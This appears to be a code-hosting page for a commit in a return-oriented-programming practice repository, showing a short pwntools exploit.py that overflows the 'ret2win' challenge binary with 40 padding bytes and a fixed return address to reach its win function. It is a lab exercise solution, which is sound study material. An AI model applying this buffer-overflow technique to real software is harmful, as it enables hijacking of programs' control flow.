rop/x86_64/ret2win/exploit.py
Brett Weiland ae586f332c new file: x86_64/ret2win/.gdb_history
new file:   x86_64/ret2win/core
	new file:   x86_64/ret2win/exploit.py
	new file:   x86_64/split/.gdb_history
	new file:   x86_64/split/core
	new file:   x86_64/split/core.split.25050
	new file:   x86_64/split/exploit.py
	new file:   x86_64/split/fuckyou
	new file:   x86_64/split/xaa
2020-12-14 18:27:06 -06:00

14 lines
242 B
Python
Executable File

#!/usr/bin/env python3
from pwn import *
prog = process('./ret2win')
payload = b''
for c in range(40):
payload += b'a'
payload += p64(0x0000000000400756)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))